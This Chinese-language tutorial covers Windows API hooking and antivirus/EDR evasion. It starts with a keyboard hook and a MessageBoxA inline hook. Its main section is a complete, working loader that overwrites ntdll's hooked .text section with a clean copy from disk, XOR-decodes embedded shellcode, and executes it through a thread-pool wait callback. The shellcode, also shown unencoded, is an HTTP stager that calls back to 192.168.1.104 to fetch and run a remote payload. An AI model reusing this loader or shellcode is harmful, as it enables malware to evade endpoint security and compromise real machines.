Windows API hook技术
A.什么叫挂钩?
钩子技术即指“给特定的函数挂上钩子,让函数在执行前先执行被挂的钩子”,从而达到拦截事件和函数调用的目的。挂钩子的本质是一个程序段。
为了方便理解我们先首先实现一个简单的keyborad挂钩
hookDLL.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" #include <string> #include <Windows.h> #include <iostream> #include <fstream> using namespace std; BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) { ofstream text; text.open("c:\\programdata\\hook.txt"); text << "HOOK"; text.close(); return CallNextHookEx(NULL, code, wParam, lParam); }
hookexe.cpp
// installhook.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <iostream> #include <windows.h> #include <strsafe.h> int main() { HOOKPROC keybords; static HINSTANCE hookdll; hookdll = LoadLibrary(TEXT("C:\\Users\\localhost\\Desktop\\hook\\keyboradProcHook\\x64\\Release\\keyboradProcHook.dll")); keybords = (HOOKPROC)GetProcAddress(hookdll, "KeyboardProc"); static HHOOK hhook; hhook = SetWindowsHookEx( WH_KEYBOARD_LL, keybords, hookdll, 0); std::cout << "Hello World!\n"; }
B通过HookedMessageBox 进一步了解hook技术
这里是https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++源代码
#include "pch.h" #include <iostream> #include <Windows.h> FARPROC messageBoxAddress = NULL; SIZE_T bytesWritten = 0; char messageBoxOriginalBytes[6] = {}; int __stdcall HookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) { // print intercepted values from the MessageBoxA function std::cout << "Ohai from the hooked function\n"; std::cout << "Text: " << (LPCSTR)lpText << "\nCaption: " << (LPCSTR)lpCaption << std::endl; // unpatch MessageBoxA WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, messageBoxOriginalBytes, sizeof(messageBoxOriginalBytes), &bytesWritten); // call the original MessageBoxA return MessageBoxA(NULL, lpText, lpCaption, uType); } int main() { // show messagebox before hooking MessageBoxA(NULL, "hi", "hi", MB_OK); HINSTANCE library = LoadLibraryA("user32.dll"); SIZE_T bytesRead = 0; // get address of the MessageBox function in memory messageBoxAddress = GetProcAddress(library, "MessageBoxA"); // save the first 6 bytes of the original MessageBoxA function - will need for unhooking ReadProcessMemory(GetCurrentProcess(), messageBoxAddress, messageBoxOriginalBytes, 6, &bytesRead); // create a patch "push <address of new MessageBoxA); ret" void* hookedMessageBoxAddress = &HookedMessageBox; char patch[6] = { 0 }; memcpy_s(patch, 1, "\x68", 1); memcpy_s(patch + 1, 4, &hookedMessageBoxAddress, 4); memcpy_s(patch + 5, 1, "\xC3", 1); // patch the MessageBoxA WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, patch, sizeof(patch), &bytesWritten); // show messagebox after hooking MessageBoxA(NULL, "hi", "hi", MB_OK); return 0; }
通过disam反汇编发现,确实再第二次调用MessgeboxA的时候执行了我们的函数
我们尝试分析hook过程
messgbox函数存在于用户层user32.dll中,所以我们先从user32.dll中找到MessgboxA的地址
然后读取当前进程的内存空间中的MessgeBoxA的地址的前6位字节用来后面unhook的时候使用
然后就是存放修改自身内存的指令
push ret
然后就是修改内存空间,
这是修改后的messgbox
进入HookedMessageBox后
C通过杀软特性实战bypass EDR
一般来说ntdll就是连接用户与内核层的最后一道防线,很多杀软在进行拦截是都是hook ntdll里面的一些函数,讨论的情况是如何bypass他
一幅图简单明了
前提是ntdll已经被hook了 当然如果没hook最好(:
#include <iostream> #include <Windows.h> #include <winternl.h> #include <psapi.h> #include <stdio.h> /* length: 798 bytes */ //unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78"; unsigned char buf[] = "\xfd\xe9\x88\x1\x1\x1\x61\x88\xe4\x30\xd3\x65\x8a\x53\x31\x8a\x53\xd\x8a\x53\x15\x8a\x73\x29\xe\xb6\x4b\x27\x30\xfe\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\xc0\xce\xc\x0\xc6\xe3\xf1\x53\x56\x8a\x53\x11\x8a\x43\x3d\x0\xd1\x8a\x41\x79\x84\xc1\x75\x4b\x0\xd1\x51\x8a\x49\x19\x8a\x59\x21\x0\xd2\xe2\x3d\x48\x8a\x35\x8a\x0\xd7\x30\xfe\x30\xc1\xad\xc0\xce\xc\x0\xc6\x39\xe1\x74\xf5\x2\x7c\xf9\x3a\x7c\x25\x74\xe3\x59\x8a\x59\x25\x0\xd2\x67\x8a\xd\x4a\x8a\x59\x1d\x0\xd2\x8a\x5\x8a\x0\xd1\x88\x45\x25\x25\x5a\x5a\x60\x58\x5b\x50\xfe\xe1\x59\x5e\x5b\x8a\x13\xea\x87\x5c\x69\x6f\x64\x75\x1\x69\x76\x68\x6f\x68\x55\x69\x4d\x76\x27\x6\xfe\xd4\x30\xfe\x56\x56\x56\x56\x56\x69\x3b\x57\x78\xa6\xfe\xd4\xe8\x85\x1\x1\x1\x5a\x30\xc8\x50\x50\x6b\x2\x50\x50\x69\x51\x1\x1\x1\x52\x51\x69\x56\x88\x9e\xc7\xfe\xd4\xea\x71\x5a\x30\xd3\x53\x69\x1\x3\x41\x85\x53\x53\x53\x52\x53\x51\x69\xea\x54\x2f\x3a\xfe\xd4\x88\xc7\x82\xc2\x51\x30\xfe\x56\x56\x6b\xfe\x52\x57\x69\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x85\xc2\x0\x1\x1\x30\xfe\x84\xf7\x75\x5\x88\xf8\xea\x8\x69\xab\xc4\xe3\x5c\xfe\xd4\x88\xc0\x69\x44\x20\x5f\x30\xfe\xd4\x30\xfe\x56\x6b\x6\x50\x57\x51\x69\xb6\x56\xe1\xa\xfe\xd4\xbe\x1\x2e\x1\x1\x38\xc6\x75\xb6\x30\xfe\xe8\x90\x0\x1\x1\xe8\xc8\x0\x1\x1\xe9\x8a\xfe\xfe\xfe\x2e\x65\x42\x51\x64\x1\xb2\x9c\xe6\x19\xb4\x91\xc2\xb5\xcd\x2e\x69\xe0\x59\xff\x31\x34\x41\x11\x33\x29\xbf\x57\x97\x5\x33\x45\x36\xdd\x84\x9a\xb5\x58\xc0\xbb\xcf\xfb\x14\xd9\x12\xe2\x17\x95\xfc\x6b\xe1\x81\xc1\xc9\x10\xbe\x80\x91\x67\xe7\xea\xa7\x4e\x94\x8\xb5\x6c\x27\x18\x68\xcb\xc0\xe9\x7d\x89\xf4\x3e\xda\x39\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x34\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x38\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x56\x4e\x56\x37\x35\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x34\x2f\x31\x3a\x21\x43\x4e\x48\x44\x38\x3a\x44\x4f\x54\x52\x28\xc\xb\x1\x27\xa5\xe\x77\x5d\xbf\xd5\x23\xda\x5c\xbe\xb1\x4\x19\xd1\x95\x42\xc6\xcf\x5e\x81\x95\x69\xb4\x46\xc3\xde\x28\xe4\x2d\x72\xb7\xfa\x85\x7c\x41\xdc\xac\xe\xc3\x71\x9b\x6f\xa5\xde\x65\x2e\xa0\x34\xfb\xca\x53\xb0\x87\x81\x8a\x52\x64\xff\x77\x9a\x1c\xf2\x34\xf4\xe9\xfd\xf3\xda\x9a\xf2\x8\x3d\x6f\x24\xd1\x5b\x2d\x9a\xe2\xf3\xb\x5b\xe5\x0\xad\xbd\x3a\x8a\xbc\x28\x5f\xf0\x4c\xf2\x13\xc\x4f\x3b\xaa\x2e\x1d\x97\x4\x78\x39\x1e\x7f\x96\x9\x14\xe4\x14\xfc\x25\x0\x32\x4c\x4e\x38\x22\x9\x45\xcf\x92\x28\x9a\xa4\xef\x25\xb6\xe8\x2d\x8c\xa9\xd3\xa6\x2d\x88\x85\xb\xd4\xca\xcd\x26\xb\x34\xaf\x5d\x47\xe1\xbb\x52\x2f\x82\xfc\xdb\xfd\xfd\xa9\xd6\xda\x71\x9f\xdf\xab\xec\x60\x6b\x7b\xd4\xde\xf4\x7\x9e\xf4\x2e\x10\x56\x6f\xa6\x62\x2f\x36\x52\x31\x97\xd4\xca\xbb\x61\x84\x26\x64\x2d\x78\xa2\x36\x4e\xae\x66\x14\xe\x90\xab\x7b\x1\x69\xf1\xb4\xa3\x57\xfe\xd4\x6b\x41\x69\x1\x11\x1\x1\x69\x1\x1\x41\x1\x56\x69\x59\xa5\x52\xe4\xfe\xd4\x92\xb8\x1\x1\x1\x1\x0\xd8\x50\x52\x88\xe6\x56\x69\x1\x21\x1\x1\x52\x57\x69\x13\x97\x88\xe3\xfe\xd4\x84\xc1\x75\xc7\x8a\x6\x0\xc2\x84\xc1\x74\xe4\x59\xc2\xe9\xa8\xfc\xfe\xfe\x30\x38\x33\x2f\x30\x37\x39\x2f\x30\x2f\x30\x31\x35\x1\x13\x35\x57\x79"; void unhook() { HANDLE process = GetCurrentProcess(); MODULEINFO mi = {}; HMODULE ntdllModule = GetModuleHandleA("ntdll.dll"); GetModuleInformation(process, ntdllModule, &mi, sizeof(mi)); LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll; HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0); PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase; PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew); for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) { PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) { DWORD oldProtection = 0; bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection); memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize); isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection); } } CloseHandle(process); CloseHandle(ntdllFile); CloseHandle(ntdllMapping); FreeLibrary(ntdllModule); } int main() { unhook(); int password = 1025; unsigned char deShellCode[1000]; int nLen = sizeof(buf) - 1; for (int i = 0; i < nLen; i++) { deShellCode[i] = buf[i] ^ password; printf("\\x%x", deShellCode[i]); } HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(deShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); unhook(); RtlMoveMemory(shellcodeAddress, deShellCode, sizeof(deShellCode)); PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL); SetThreadpoolWait(threadPoolWait, event, NULL); WaitForSingleObject(event, INFINITE); return 0; } //#include <stdio.h> //#include <Windows.h> // ///* length: 798 bytes */ //unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78"; // // //int main(int argc, char* argv[]) //{ // int password = 1025; // unsigned char enShellCode[1000]; // unsigned char deShellCode[1000]; // int nLen = sizeof(buf) - 1; // // for (int i = 0; i < nLen; i++) // { // enShellCode[i] = buf[i] ^ password; // printf("\\x%x", enShellCode[i]); // } // // printf("\n"); // // /*for (int i = 0; i < nLen; i++) // { // deShellCode[i] = enShellCode[i] ^ password; // printf("\\x%x", deShellCode[i]); // }*/ // // system("pause"); // return 0; //}
D总结
当然 这次这是提到了一种unhook的手法,还有很多种比如 https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher以及ACGhttps://www.countercraftsec.com/blog/post/arbitrary-vs-kernel/
也可以直接调用syscall来不与api交互,当然这些都是玩烂了的手法。只是体力活而已
参考
https://xz.aliyun.com/t/9166#toc-5
https://www.cnblogs.com/LyShark/p/13033722.html
https://improsec.com/tech-blog/user-mode-api-hooks-and-bypasses
https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/acg-arbitrary-code-guard-processdynamiccodepolicy
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis